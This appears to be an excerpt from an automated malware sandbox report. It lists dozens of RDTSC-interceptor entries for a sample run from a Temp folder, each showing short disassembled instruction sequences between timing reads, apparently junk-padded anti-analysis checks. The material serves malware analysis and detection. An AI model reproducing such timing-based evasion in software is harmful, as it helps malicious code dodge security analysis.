                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59A94C second address: 59A96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push ebx 0x00000007 jmp 00007F29F0C52767h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59AB01 second address: 59AB05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59AC79 second address: 59AC9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29F0C5275Ch 0x00000009 jg 00007F29F0C52756h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007F29F0C52756h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 545E7C second address: 545EA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F29F0CD529Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59ADCD second address: 59ADD7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F29F0C52756h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59AF33 second address: 59AF56 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F29F0CD52AAh 0x00000008 jmp 00007F29F0CD52A2h 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59AF56 second address: 59AF5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59AF5A second address: 59AF64 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F29F0CD5296h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59BA10 second address: 59BA14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59BA14 second address: 59BA28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F29F0CD5296h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F29F0CD5296h 0x00000014 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59BA28 second address: 59BA2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59BA2E second address: 59BA34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59BA34 second address: 59BA38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59BA38 second address: 59BA50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A4236 second address: 5A423C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A423C second address: 5A426C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F29F0CD52A3h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A426C second address: 5A4274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A4274 second address: 5A4297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29F0CD52A4h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jns 00007F29F0CD5296h 0x00000014 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A2290 second address: 5A229B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F29F0C52756h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A229B second address: 5A22A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A22A1 second address: 5A22DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F29F0C52764h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F29F0C52766h 0x00000012 push eax 0x00000013 push edx 0x00000014 js 00007F29F0C52756h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A22DD second address: 5A22E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A22E1 second address: 5A22E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A22E5 second address: 5A22F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F29F0CD5296h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A22F5 second address: 5A22FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A22FB second address: 5A22FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A28CD second address: 5A28D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A2DF2 second address: 5A2E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F29F0CD52A0h 0x0000000c rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A2E09 second address: 5A2E26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52764h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A3749 second address: 5A374D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A374D second address: 5A3753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A3A33 second address: 5A3A39 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A8126 second address: 5A8149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F29F0C52767h 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A8149 second address: 5A8155 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F29F0CD5296h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A7441 second address: 5A7456 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F29F0C52756h 0x0000000a jmp 00007F29F0C5275Bh 0x0000000f rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A7456 second address: 5A745A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A785B second address: 5A7879 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52767h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A79D8 second address: 5A79DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A79DC second address: 5A79E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A79E4 second address: 5A7A02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F29F0CD52A8h 0x0000000b rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A7CDA second address: 5A7CF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52764h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A7CF8 second address: 5A7D16 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jns 00007F29F0CD5296h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007F29F0CD529Ah 0x00000012 pushad 0x00000013 popad 0x00000014 push edx 0x00000015 pop edx 0x00000016 jg 00007F29F0CD529Eh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5ACAB3 second address: 5ACAB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5ACAB9 second address: 5ACABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5B2DA2 second address: 5B2DBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F29F0C52756h 0x0000000a jnl 00007F29F0C52756h 0x00000010 popad 0x00000011 jg 00007F29F0C5275Ch 0x00000017 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5B2DBF second address: 5B2DDE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F29F0CD52A4h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5B309C second address: 5B30A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5B30A2 second address: 5B30A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5B30A6 second address: 5B30AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5B30AD second address: 5B30B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5B30B5 second address: 5B30F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F29F0C52772h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F29F0C52761h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5B30F4 second address: 5B30FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5B30FC second address: 5B3101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5B3280 second address: 5B32B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29F0CD52A9h 0x00000009 jmp 00007F29F0CD52A1h 0x0000000e popad 0x0000000f pushad 0x00000010 jnl 00007F29F0CD5296h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5B33ED second address: 5B33F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop edi 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5B3829 second address: 5B382D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5B382D second address: 5B383B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jnl 00007F29F0C52756h 0x0000000d pop ebx 0x0000000e rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5B468C second address: 5B4690 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5B4690 second address: 5B46B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F29F0C52769h 0x00000010 pop ecx 0x00000011 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5B46B5 second address: 5B46DA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F29F0CD529Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F29F0CD52A5h 0x00000015 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5B2545 second address: 5B254F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F29F0C52756h 0x0000000a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5B254F second address: 5B2553 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5B2553 second address: 5B255C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5B88A1 second address: 5B88AB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F29F0CD5296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5BD14A second address: 5BD14E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5BD14E second address: 5BD178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F29F0CD52AFh 0x0000000c jmp 00007F29F0CD52A3h 0x00000011 jno 00007F29F0CD5296h 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5BD178 second address: 5BD17E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5BD2DB second address: 5BD2E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5BD2E1 second address: 5BD2E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5BD2E5 second address: 5BD319 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F29F0CD5296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F29F0CD529Ch 0x00000013 push edx 0x00000014 jmp 00007F29F0CD52A9h 0x00000019 pop edx 0x0000001a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5BD319 second address: 5BD31F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5BD31F second address: 5BD329 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5BD329 second address: 5BD32F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5CB9EE second address: 5CB9F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5CB9F2 second address: 5CB9F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5CB568 second address: 5CB581 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F29F0CD52A4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5D0A79 second address: 5D0A84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5D0A84 second address: 5D0A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5D0A88 second address: 5D0A8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5D0633 second address: 5D0660 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A4h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007F29F0CD5298h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007F29F0CD5298h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5D07AF second address: 5D07B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
